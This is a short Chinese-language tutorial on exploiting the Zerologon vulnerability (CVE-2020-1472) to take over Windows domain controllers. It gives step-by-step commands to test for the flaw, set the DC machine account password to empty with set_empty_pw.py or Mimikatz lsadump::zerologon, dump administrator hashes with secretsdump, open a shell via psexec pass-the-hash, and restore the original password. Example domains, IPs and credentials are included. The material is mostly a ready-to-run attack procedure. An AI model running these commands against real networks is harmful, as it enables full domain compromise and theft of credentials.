目錄
漏洞簡介
漏洞檢測
漏洞利用
使用腳本進行利用
使用Mimikatz進行利用
恢復用戶哈希
漏洞簡介
CVE-2020-1472是繼永恒之藍漏洞之后又一個好用的內網提權漏洞,影響Windows Server2008R2至2019的版本。只要攻擊者能夠訪問到目標域控并且知道域控計算機名即可利用該漏洞。
該漏洞不要求當前計算機在域內,也不要求當前計算機操作系統為Windows,該漏洞的穩定利用方式為重置目標域控的密碼,然后利用域控憑證進行DC Sync獲取域管權限后修復域控密碼。漏洞利用過程中會重置域控存儲在域中的憑證,而域控存儲在域中的憑證域本地的注冊表中的憑證不一致時,會導致目標域控脫域,所以在重置完域控憑證后要盡快恢復。
漏洞檢測
利用腳本進行檢測:GitHub - SecuraBV/CVE-2020-1472: Test tool for CVE-2020-1472
如果返回success,則表示漏洞存在。
python3 zerologon_tester.py 域控計算機名稱 域控ip
?
漏洞利用
使用腳本進行利用
腳本地址:
GitHub - risksense/zerologon: Exploit for zerologon cve-2020-1472
https://github.com/fortra/impacket
1、查詢域控機器用戶的哈希
python3 secretsdump.py abc.com/Administrator:Admin@192.168.75.143 -just-dc-hashes "WIN-DC$"
2、修改域控賬號哈希為空
python3 set_empty_pw.py 域控機器名名稱 域控ip
3、再次查看域控機器賬號的哈希,可以在線hash解碼,發現查詢結果是空密碼
python3 secretsdump.py abc.com/Administrator:Admin@192.168.75.143 -just-dc-hashes "WIN-DC$"
4、連接域控機器用戶賬號,導出administrator用戶的哈希
python3 secretsdump.py "abc/WIN_DC$"@192.168.75.143 -hashes [hash值]
5、連接域控管理員賬號
python3 psexec.py abc/administrator@192.168.75.143 -hashes [hash值]
使用Mimikatz進行利用
如果當前主機在域環境中,則target 這里可以直接使用FQDN
lsadump::zerologon /target:WIN-DC.abc.com /ntlm /null /account:WIN-DC$ /exploit
如果當前主機不在域環境中,則target 這里可以直接指定 ip
lsadump::zerologon /target:域控ip /ntlm /null /account:WIN-DC$ /exploit
恢復用戶哈希
python3 reinstall_original_pw.py WIN_DC 192.168.75.143 [hash值]